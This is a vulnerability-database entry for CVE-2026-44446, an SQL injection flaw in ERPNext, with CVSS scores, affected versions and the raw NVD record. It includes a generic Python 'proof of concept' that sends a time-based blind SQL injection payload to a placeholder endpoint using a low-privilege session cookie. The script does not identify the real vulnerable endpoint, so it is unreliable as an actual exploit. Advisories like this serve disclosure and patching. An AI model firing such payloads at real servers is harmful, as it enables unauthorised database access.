Security Vulnerability Report
中文
CVE-2026-44446 CVSS 8.8 HIGH

CVE-2026-44446

Published: 2026-05-13 22:16:46
Last Modified: 2026-05-14 20:01:41

Description

ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 15.104.3 and 16.14.0, some endpoints were vulnerable to SQL injection through specially crafted requests, which would allow a malicious actor to extract sensitive information. This vulnerability is fixed in 15.104.3 and 16.14.0.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:frappe:erpnext:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:frappe:erpnext:*:*:*:*:*:*:*:* - VULNERABLE
ERPNext < 15.104.3
ERPNext < 16.14.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2026-44446 Proof of Concept (PoC) # Target: ERPNext < 15.104.3, < 16.14.0 # Description: Tests for SQL Injection in vulnerable endpoints target_url = "http://example.com/api/resource/TargetEndpoint" session_id = "low_priv_user_session_id" # Payload to test SQL injection (e.g., time-based blind) payload = "1' AND (SELECT * FROM (SELECT(SLEEP(5)))a)-- -" headers = { "Cookie": f"sid={session_id}" } params = { "filters": payload } try: print("[+] Sending malicious request to target...") response = requests.get(target_url, headers=headers, params=params, timeout=10) if response.elapsed.total_seconds() >= 5: print("[!] Potential SQL Injection vulnerability confirmed (Time-based delay detected).") else: print("[-] Vulnerability not detected or payload blocked.") except Exception as e: print(f"[Error] An exception occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44446", "sourceIdentifier": "[email protected]", "published": "2026-05-13T22:16:45.637", "lastModified": "2026-05-14T20:01:40.860", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 15.104.3 and 16.14.0, some endpoints were vulnerable to SQL injection through specially crafted requests, which would allow a malicious actor to extract sensitive information. This vulnerability is fixed in 15.104.3 and 16.14.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frappe:erpnext:*:*:*:*:*:*:*:*", "versionEndExcluding": "15.104.3", "matchCriteriaId": "945FED36-A40E-4F5F-A517-F599658AFF70"}, {"vulnerable": true, "criteria": "cpe:2.3:a:frappe:erpnext:*:*:*:*:*:*:*:*", "versionStartIncluding": "16.0.0", "versionEndExcluding": "16.14.0", "matchCriteriaId": "C5ACB2A6-721E-4E63-875B-9FE972107F9D"}]}]}], "references": [{"url": "https://github.com/frappe/erpnext/security/advisories/GHSA-6fm9-g88m-hxr7", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}